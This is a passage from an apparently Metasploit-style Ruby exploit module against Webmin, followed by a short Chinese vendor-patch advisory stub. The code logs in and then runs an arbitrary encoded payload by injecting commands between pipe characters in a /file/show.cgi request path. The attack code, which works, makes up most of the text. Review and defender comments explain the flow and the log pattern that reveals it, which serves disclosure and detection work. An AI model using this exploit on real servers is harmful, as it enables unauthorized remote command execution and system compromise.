res = send_request_cgi(
            {
                'method'  => 'POST',
                'uri'     => "/session_login.cgi",
                'cookie'  => "testing=1",
                'data'    => data
            }, 25)
if res and res.code == 302 and res.headers['Set-Cookie'] =~ /sid/
            print_good "#{peer} - Authentication successful"
            session = res.headers['Set-Cookie'].split("sid=")[1].split(";")[0]
        else
            print_error "#{peer} - Authentication failed"
            return Exploit::CheckCode::Unknown
        end
print_status("#{peer} - Attempting to execute...")
command = "echo #{rand_text_alphanumeric(rand(5) + 5)}"
res = send_request_cgi(
            {
                'uri'     => "/file/show.cgi/bin/#{rand_text_alphanumeric(5)}|#{command}|",
                'cookie'  => "sid=#{session}"
            }, 25)
        if res and res.code == 200 and res.message =~ /Document follows/
            return Exploit::CheckCode::Appears
        else
            return Exploit::CheckCode::Safe
        end
end
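# Logs in to Webmin with the configured credentials, then sends one request
# to /file/show.cgi whose path carries the encoded payload between pipe
# characters.
#
# Flow, as visible in this method:
#   1. POST /session_login.cgi with USERNAME/PASSWORD from the datastore and
#      a "testing=1" cookie. A 302 response whose Set-Cookie header yields a
#      non-empty sid value is treated as a successful login.
#   2. GET /file/show.cgi/bin/<5-9 random alphanumerics>|<payload>| with the
#      sid cookie. A 200 response whose status message matches
#      "Document follows" is reported as successful execution.
#
# Defender note: both requests use the ordinary HTTP interface and step 2
# requires a valid session, so the activity is tied to an account. A request
# path under /file/show.cgi that contains a "|" character is the distinctive
# artifact of step 2; where HTTP access logging is enabled, that is a
# reasonable pattern to alert on, together with the login that precedes it.
#
# @return [void] the outcome is reported through print_good / print_error
def exploit
  peer = "#{rhost}:#{rport}"

  print_status("#{peer} - Attempting to login...")

  # NOTE(review): USERNAME and PASSWORD are interpolated into the form body
  # without URL-encoding, so a value containing "&", "=", "%" or "+" would be
  # misparsed by the server. Confirm whether encoding is wanted here.
  data = "page=%2F&user=#{datastore['USERNAME']}&pass=#{datastore['PASSWORD']}"

  # The second argument (25) is the request timeout passed to
  # send_request_cgi.
  res = send_request_cgi(
    {
      'method' => 'POST',
      'uri'    => "/session_login.cgi",
      'cookie' => "testing=1",
      'data'   => data
    }, 25)

  unless res && res.code == 302 && res.headers['Set-Cookie'] =~ /sid/
    print_error "#{peer} - Authentication failed"
    return
  end

  # "sid" can appear in Set-Cookie without a usable value, so the session id
  # is extracted explicitly and an empty result is treated as a failed login.
  session = res.headers['Set-Cookie'].scan(/sid\=(\w+)\;*/).flatten[0] || ''
  if session.empty?
    print_error "#{peer} - Authentication failed"
    return
  end

  # Reported exactly once; the original printed this line twice on success.
  print_good "#{peer} - Authentication successfully"

  print_status("#{peer} - Attempting to execute the payload...")

  command = payload.encoded

  res = send_request_cgi(
    {
      'uri'    => "/file/show.cgi/bin/#{rand_text_alphanumeric(rand(5) + 5)}|#{command}|",
      'cookie' => "sid=#{session}"
    }, 25)

  if res && res.code == 200 && res.message =~ /Document follows/
    print_good "#{peer} - Payload executed successfully"
  else
    print_error "#{peer} - Error executing the payload"
    return
  end
end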
end
建议:
--------------------------------------------------------------------------------
厂商补丁:
Webmin
------
目前厂商已经发布了升级补丁以修复这个安全问题,请到厂商的主页下载:
